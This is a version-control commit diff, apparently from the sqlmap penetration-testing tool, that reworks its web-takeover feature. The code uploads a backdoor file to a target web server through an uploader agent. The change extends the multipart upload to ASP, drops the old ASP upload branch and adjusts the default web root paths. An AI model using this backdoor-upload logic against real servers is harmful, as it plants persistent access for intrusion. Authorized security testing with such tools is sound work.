some changes regarding web takeover

2025-03-03 11:45:46 +03:00 · 2010-02-09 14:27:41 +00:00 · 2010-02-09 14:27:41 +00:00 · 00a23ace9a
commit 00a23ace9a
parent 542b01993e
2 changed files with 9 additions and 20 deletions
--- a/lib/core/common.py
+++ b/lib/core/common.py
@ -232,6 +232,8 @@ def getDocRoot():

    if kb.absFilePaths:
        for absFilePath in kb.absFilePaths:
+            if directoryPath(absFilePath) == '/':
+                continue
            absFilePath = normalizePath(absFilePath)
            absFilePathWin = None

@ -271,20 +273,22 @@ def getDirs():
    directories = set()

    if kb.os == "Windows":
-        defaultDir = "C:/Inetpub/wwwroot/test/"
+        defaultDir = "C:/Inetpub/wwwroot/"
    else:
-        defaultDir = "/var/www/test/"
+        defaultDir = "/var/www/"

    if kb.absFilePaths:
        infoMsg  = "retrieved web server full paths: "
        infoMsg += "'%s'" % ", ".join(path for path in kb.absFilePaths)
        logger.info(infoMsg)
-
+        
        for absFilePath in kb.absFilePaths:
            if absFilePath:
                directory = directoryPath(absFilePath)
                if isWindowsPath(directory):
                    directory = directory.replace('\\', '/')
+                if directory == '/':
+                    continue
                directories.add(directory)
    else:
        warnMsg = "unable to retrieve any web server path"
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@ -86,14 +86,14 @@ class Web:
        return retVal

    def __webFileStreamUpload(self, stream, destFileName, directory):
-        if self.webApi == "php":
+        if self.webApi in ("php", "asp"):
            multipartParams = {
                                "upload":    "1",
                                "file":      stream,
                                "uploadDir": directory,
                              }
                              
-            page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams)
+            page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams, raise404=False)

            if "File uploaded" not in page:
                warnMsg  = "unable to upload the backdoor through "
@ -103,21 +103,6 @@ class Web:
            else:
                return True

-        elif self.webApi == "asp":
-            backdoorRemotePath = "%s/%s" % (directory, destFileName)
-            backdoorRemotePath = normalizePath(backdoorRemotePath)
-            backdoorContent = stream.read()
-            postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
-            page, _ = Request.getPage(url=self.webUploaderUrl, direct=True, post=postStr)
-
-            if "permission denied" in page.lower():
-                warnMsg  = "unable to upload the backdoor through "
-                warnMsg += "the uploader agent on '%s'" % directory
-                logger.warn(warnMsg)
-                return False
-            else:
-                return True
-
        elif self.webApi == "jsp":
            return False